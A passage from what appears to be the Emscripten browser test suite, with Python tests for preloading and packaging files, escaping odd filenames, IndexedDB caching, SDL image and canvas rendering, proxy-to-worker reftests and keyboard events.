def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path))
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for test in test_cases:
(srcpath, dstpath) = test
print('Testing', srcpath, dstpath)
make_main(dstpath)
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test that '--no-heap-copy' works.
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', tricky_filename.replace('@', '@@'), '--no-heap-copy', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete(self.in_dir('assets'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/').replace('\\', '/'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/.git').replace('\\', '/')) # Test adding directory that shouldn't exist.
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset2/').replace('\\', '/'))
open(os.path.join(self.get_dir(), 'assets/sub/asset1/file1.txt'), 'w').write('''load me right before running the code please''')
open(os.path.join(self.get_dir(), 'assets/sub/asset1/.git/shouldnt_be_embedded.txt'), 'w').write('''this file should not get embedded''')
open(os.path.join(self.get_dir(), 'assets/sub/asset2/file2.txt'), 'w').write('''load me right before running the code please''')
absolute_assets_src_path = os.path.join(self.get_dir(), 'assets').replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath)))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
try:
os.mkdir(os.path.join(self.get_dir(), 'dirrey'))
except:
pass
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(os.path.join(path_from_root('tests/manual_download_data.cpp'))).read()))
data = os.path.join(self.get_dir(), 'file.txt')
open(data, 'w').write('''Hello!''')
run_process([PYTHON, EMCC, 'src.cpp', '-o', 'manual_download_data.js', '--preload-file', data + '@/file.txt'])
shutil.copyfile(path_from_root('tests', 'manual_download_data.html'), os.path.join(self.get_dir(), 'manual_download_data.html'))
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
try:
os.mkdir(abs_d)
except:
pass
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"'))))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
run_process([PYTHON, FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
run_process([PYTHON, EMCC, cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % 'somefile.txt'))
open(os.path.join(self.get_dir(), 'test.js'), 'w').write('''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
for extra_size in (0, 50 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''load me right before running the code please''' + ('_' * extra_size))
print(os.path.getsize('somefile.txt'))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--use-preload-cache', '--js-library', os.path.join(self.get_dir(), 'test.js'), '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''load me right before running the code please''')
def make_main(path):
print(path)
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path))
open(os.path.join(self.get_dir(), 'test.js'), 'w').write('''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
run_process([PYTHON, FILE_PACKAGER, os.path.join(self.get_dir(), 'somefile.data'), '--use-preload-cache', '--indexedDB-name=testdb', '--preload', os.path.join(self.get_dir(), 'somefile.txt'), '--js-output=' + os.path.join(self.get_dir(), 'somefile.js')])
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--js-library', os.path.join(self.get_dir(), 'test.js'), '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'subdirr'))
os.makedirs(os.path.join(self.get_dir(), 'subdirr', 'moar'))
open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
open(os.path.join(self.get_dir(), 'subdirr', 'moar', 'data2.txt'), 'w').write('''3.14159265358979''')
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
'''))
# by individual files
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', 'subdirr', '-o', 'page.html'])
shutil.rmtree(os.path.join(self.get_dir(), 'subdirr'))
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'subdirr'))
os.makedirs(os.path.join(self.get_dir(), 'cdn'))
open(os.path.join(self.get_dir(), 'subdirr', 'data1.txt'), 'w').write('''1214141516171819''')
# change the file package base dir to look in a "cdn". note that normally you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
'''))
def test():
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
test()
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
open(self.in_dir("data.txt"), "w").write('''data''')
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
REPORT_RESULT(0);
return 0;
}
'''))
open(os.path.join(self.get_dir(), 'on_window_error_shell.html'), 'w').write(r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test test missing file should run xhr.onload with status different than 200, 304 or 206
setup("")
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
open(os.path.join(self.get_dir(), 'sdl_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
run_process([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image.c'), '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
open(os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_image.c')).read()))
run_process([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'])
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp1.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp2.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp3.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp4.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O0', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O2', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
open('test.html', 'w').write(html)
def test_sdl_canvas_proxy(self):
open('data.txt', 'w').write('datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy(self):
# we modify the asm.js, this is a non-wasm test
self.btest('hello_world_gles_proxy.c', reference='gears.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-DSTATIC_GEARS=1', '-lGL', '-lglut', '-s', 'WASM=0'], manual_reference=True, post_build=self.post_manual_reftest)
# test noProxy option applied at runtime
# run normally (duplicates above test, but verifies we can run outside of the btest harness
self.run_browser('test.html', None, ['/report_result?0'])
# run with noProxy
self.run_browser('test.html?noProxy', None, ['/report_result?0'])
def copy(to, js_mod, html_mod=lambda x: x):
open(to + '.html', 'w').write(html_mod(open('test.html').read().replace('test.js', to + '.js')))
open(to + '.js', 'w').write(js_mod(open('test.js').read()))
# run with noProxy, but make main thread fail
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('two.html?noProxy', None, ['/report_result?999'])
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original))
self.run_browser('two.html', None, ['/report_result?0']) # this is still cool
# run without noProxy, so proxy, but make worker fail
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('three.html', None, ['/report_result?999'])
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original))
self.run_browser('three.html?noProxy', None, ['/report_result?0']) # this is still cool
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
run_process([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING=1', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/kripken/emscripten/issues/4069.
open(os.path.join(self.get_dir(), 'flag_0.js'), 'w').write('''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for emterps in [
[],
['-DTEST_SLEEP', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-s', 'ASSERTIONS=1', '-s', "SAFE_HEAP=1"]
]:
print(delay, defines, emterps)
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
open(os.path.join(self.get_dir(), 'sdl_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_key.c')).read()))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_key.c'), '-o', 'page.html'] + defines + emterps + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
open('test.html', 'w').write(html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest('canvas_focus.c', '1')
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
